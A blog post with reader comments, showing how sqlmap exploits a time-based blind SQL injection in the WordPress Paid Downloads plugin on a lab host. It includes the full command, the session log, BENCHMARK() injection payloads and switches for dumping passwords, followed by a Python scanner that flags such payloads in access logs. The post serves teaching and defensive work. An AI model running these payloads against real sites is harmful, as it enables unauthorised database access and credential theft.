For all of you who have wondered how to exploit time-based SQLi vulnerabilities, here you'll find a short presentation using sqlmap. This is also dedicated to all the people around who think that time-based injection is of no significant practical value.
If you've followed the vulnerabilities posted lately on this blog, you've probably seen some of the PoCs (Proof of Concept) containing payloads like "-1 AND 1=IF(2>1, BENCHMARK(5000000, MD5(CHAR(115,113,108,109,97,112))),0)--%20". The heavy BENCHMARK() call only runs when the IF() condition holds, so the truth of the condition is read from the response time alone. Those cases are perfect candidates for some good old time-based exploitation.
We'll take "WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability" as the candidate for this little presentation:
$ python sqlmap.py -u "http://172.16.180.133/wp-content/plugins/paid-downloads/download.php?download_key=1" --dbms=mysql --level=3 --risk=3 --technique=T --banner
sqlmap/1.0-dev (r4374) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:54:25
[18:54:25] [INFO] using '/home/stamparm/Work/sqlmap/output/172.16.180.133/session' as session file
[18:54:25] [INFO] testing connection to the target url
[18:54:27] [INFO] heuristics detected web page charset 'ascii'
[18:54:27] [INFO] testing if the url is stable, wait a few seconds
[18:54:29] [INFO] url is stable
[18:54:29] [INFO] testing if GET parameter 'download_key' is dynamic
[18:54:31] [WARNING] GET parameter 'download_key' appears to be not dynamic
[18:54:33] [WARNING] heuristic test shows that GET parameter 'download_key' might not be injectable
[18:54:33] [INFO] testing sql injection on GET parameter 'download_key'
[18:54:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:54:33] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:54:34] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[18:54:38] [CRITICAL] there is considerable lagging (standard deviation: 0.9 sec) in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
[18:54:43] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[18:55:05] [INFO] GET parameter 'download_key' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[18:55:05] [INFO] checking if the injection point on GET parameter 'download_key' is a false positive
GET parameter 'download_key' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Place: GET
Parameter: download_key
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: download_key=1' AND 6424=BENCHMARK(5000000,MD5(CHAR(102,100,78,99))) AND 'uzOQ'='uzOQ
---
[18:55:36] [INFO] testing MySQL
[18:55:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[18:55:46] [INFO] confirming MySQL
[18:56:05] [INFO] the back-end DBMS is MySQL
[18:56:05] [INFO] fetching banner
[18:56:05] [INFO] retrieved: 5.1.41-3ubuntu12.8
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.41-3ubuntu12.8'
[19:07:44] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/output/172.16.180.133'
[*] shutting down at 19:07:44
P.S. Notice that retrieving the banner took around 10 minutes (in cases like these, attackers will take only the most sensitive information, such as usernames and passwords). In the same way you can retrieve other data using switches like --users, --passwords, --dump, etc.
$ python -c "print ''.join([chr(x) for x in [115,113,108,109,97,112]])" sqlmap:)
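On the defender's side, the same BENCHMARK()/CHAR() payloads are easy to spot in web-server logs, and decoding the CHAR() sequences shows what was actually being compared (here the "sqlmap" marker and the "fdNc" string from the session above). The scanner below is an added example, not code from the original post or from the sqlmap project; the Apache-style log lines and client addresses it scans are constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache combined-log lines (not from the original post) carrying
# the BENCHMARK()-style payloads shown above plus one unrelated SLEEP() probe.
SAMPLE_LOG = """\
172.16.180.1 - - [10/Oct/2011:18:54:33 +0200] "GET /wp-content/plugins/paid-downloads/download.php?download_key=1%27%20AND%206424%3DBENCHMARK(5000000%2CMD5(CHAR(102%2C100%2C78%2C99)))%20AND%20%27uzOQ%27%3D%27uzOQ HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"
172.16.180.1 - - [10/Oct/2011:18:54:35 +0200] "GET /wp-content/plugins/paid-downloads/download.php?download_key=-1%20AND%201%3DIF(2%3E1%2CBENCHMARK(5000000%2CMD5(CHAR(115%2C113%2C108%2C109%2C97%2C112)))%2C0)--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.180.1 - - [10/Oct/2011:18:54:36 +0200] "GET /wp-content/plugins/paid-downloads/download.php?download_key=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2011:18:55:01 +0200] "GET /index.php?p=3%20AND%20SLEEP(5) HTTP/1.1" 200 2048 "-" "curl/7.21"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Delay primitives that make a query's wall-clock time depend on a condition.
TIME_FUNCS = re.compile(r'\b(BENCHMARK|SLEEP|WAITFOR\s+DELAY|PG_SLEEP)\b', re.I)
CHAR_RE = re.compile(r'CHAR\(([\d,\s]+)\)', re.I)

def decode_char_calls(sql):
    """Replace MySQL CHAR(115,113,...) sequences with the literal they build."""
    return CHAR_RE.sub(lambda m: repr(''.join(chr(int(n)) for n in m.group(1).split(','))), sql)

def scan_access_log(text):
    """Return one finding per request using a delay primitive, plus a
    per-(client, parameter) count: dozens of hits on one parameter within
    minutes is the signature of character-by-character time-based retrieval."""
    findings, counts = [], defaultdict(int)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group('path').partition('?')
        for pair in query.split('&'):
            param, _, raw = pair.partition('=')
            value = unquote(raw)  # decode %27, %20, %2C ... before matching
            if TIME_FUNCS.search(value):
                counts[(m.group('ip'), param)] += 1
                findings.append({'ip': m.group('ip'), 'path': path, 'param': param,
                                 'decoded': decode_char_calls(value)})
    return findings, dict(counts)

if __name__ == '__main__':
    hits, per_param = scan_access_log(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['path'], h['param'], '->', h['decoded'])
    print(per_param)
```

Response times are not in the default combined log format; adding %D to LogFormat lets the same scanner correlate the flagged requests with their elevated latency.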
12 comments:
ah ok, so time-based "guesses" which information is being queried from the time consumed? how crazy is that... very good tool, this sqlmap.
Hi Miroslav,
Some time ago I read about a technique to read a file with a BSQLi and load_file(), but instead of reading char by char it reads byte per byte reducing, and I don't find it. Do you know about it?